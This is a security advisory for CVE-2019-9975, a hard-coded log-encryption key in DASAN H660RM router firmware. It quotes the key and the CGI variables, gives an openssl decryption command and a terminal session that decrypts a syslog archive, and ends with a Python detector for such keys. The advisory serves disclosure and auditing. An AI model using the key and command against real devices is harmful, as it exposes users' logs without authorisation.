DASAN H660RM devices with firmware 1.03-0022 (and possibly others) use a hard-coded key “dasanektks123” for log encryption. Data encrypted with this key can be decrypted by anyone who has access to the key.
This vulnerability was assigned CVE-2019-9975.
A CWE-321 (Use of Hard-coded Cryptographic Key) weakness exists in syslog_tool.cgi:
ENC_PASSWORD="dasanektks123"
TMP_SYSLOG_FOLDER="/tmp/var/log/syslog/"
ENCRYPT_FILE="syslog_`date +%Y_%m_%d_%H_%M_%S`.tar.gz"
COMPRESS_FILE="syslog_compress.tar.gz"
The syslog_tool.cgi script uses OpenSSL’s aes-128-cbc encryption. Logs can be decrypted with the command:
openssl enc -aes-128-cbc -d -k dasanektks123 -in encrypted.tar.gz -out cleartext.tar.gz
Decryption of logs follows.
kali ~/Downloads $ la
total 136K
drwxr-xr-x 2 user user 4.0K Mar 8 21:41 ./
drwx------ 23 user user 4.0K Mar 8 21:41 ../
-rw-r--r-- 1 user user 127K Mar 8 20:12 syslog_1970_01_01_00_18_49.tar.gz
kali ~/Downloads $ file *
syslog_1970_01_01_00_18_49.tar.gz: openssl enc'd data with salted password
kali ~/Downloads $ openssl enc -aes-128-cbc -d -k dasanektks123 -in syslog_1970_01_01_00_18_49.tar.gz -out cleartext-syslog_1970_01_01_00_18_49.tar.gz
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
kali ~/Downloads $ file *
cleartext-syslog_1970_01_01_00_18_49.tar.gz: gzip compressed data, max compression, from Unix, original size 735232
syslog_1970_01_01_00_18_49.tar.gz: openssl enc'd data with salted password
kali ~/Downloads $ tar xvf cleartext-syslog_1970_01_01_00_18_49.tar.gz
data/log/
data/log/messages
kali ~/Downloads $ head data/log/messages
=== [REBOOT REASON] ==============================
POWERBOOT_BY_LOCAL e30ef88d
=== [LOG - BEGIN] ============================
=== [LOG - END] ==============================
Jan 1 00:01:08 kernel: klogd started: BusyBox v1.00 (2017.11.10-07:25+0000)
Jan 1 00:01:08 kernel: Error! phy_I2C_read return value = 0
Jan 1 00:01:08 kernel: u1DevAddr:0x51, u4WordAddr:0x70
Jan 1 00:01:08 kernel: _SIF_DrvRawRead:^M
Jan 1 00:01:08 kernel: Error sub-addr!
Jan 1 00:01:08 kernel: Error! phy_I2C_read return value = 0
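
As an added example (not part of the original advisory and not DASAN's code), the Python check below flags this CWE-321 pattern when auditing shell scripts from an extracted firmware image: an openssl call whose passphrase is a literal, or a variable assigned a literal earlier in the same script. The openssl invocation lines in the sample are constructed, since the advisory quotes only the variable assignments, and the function and pattern names are hypothetical.

```python
import re

# Constructed sample: the assignments mirror the advisory; the two openssl
# invocation lines are assumptions, since the advisory does not quote them.
SAMPLE_CGI = '''#!/bin/sh
ENC_PASSWORD="dasanektks123"
TMP_SYSLOG_FOLDER="/tmp/var/log/syslog/"
COMPRESS_FILE="syslog_compress.tar.gz"
openssl enc -aes-128-cbc -k $ENC_PASSWORD -in $COMPRESS_FILE -out out.tar.gz
openssl enc -aes-128-cbc -pass file:/etc/device.key -in a -out b
'''

# NAME=value where value is a plain literal (no $expansion, no `command`).
ASSIGN = re.compile(r'^\s*(?:export\s+)?([A-Za-z_]\w*)=(["\']?)([^"\'$`\s]+)\2\s*$')
# Passphrase given on the command line: -k <pw> or -pass/-passin/-passout pass:<pw>.
PASS_ARG = re.compile(
    r'(?<!\S)(?:-k\s+["\']?|-pass(?:in|out)?\s+["\']?pass:)(\$\{?\w+\}?|[^\s"\']+)')
VAR_REF = re.compile(r'^\$\{?(\w+)\}?$')


def find_hardcoded_openssl_secrets(script_text):
    """Return (line_no, variable_or_None, literal) for every openssl call whose
    passphrase is a literal, or a variable assigned a literal earlier in the script."""
    literals, findings = {}, []
    for line_no, line in enumerate(script_text.splitlines(), 1):
        if line.lstrip().startswith('#'):
            continue                      # comments and the shebang
        assignment = ASSIGN.match(line)
        if assignment:
            literals[assignment.group(1)] = assignment.group(3)
            continue
        if 'openssl' not in line:
            continue
        for arg in PASS_ARG.finditer(line):
            value = arg.group(1)
            ref = VAR_REF.match(value)
            if ref is None:
                findings.append((line_no, None, value))        # inline literal
            elif ref.group(1) in literals:
                findings.append((line_no, ref.group(1), literals[ref.group(1)]))
    return findings


if __name__ == '__main__':
    for line_no, var, secret in find_hardcoded_openssl_secrets(SAMPLE_CGI):
        print(f'line {line_no}: openssl passphrase is hard-coded ({var or "inline"}={secret!r})')
```

A passphrase read from a file or from a variable that the script does not assign a literal to is not flagged, so the second openssl line in the sample produces no finding.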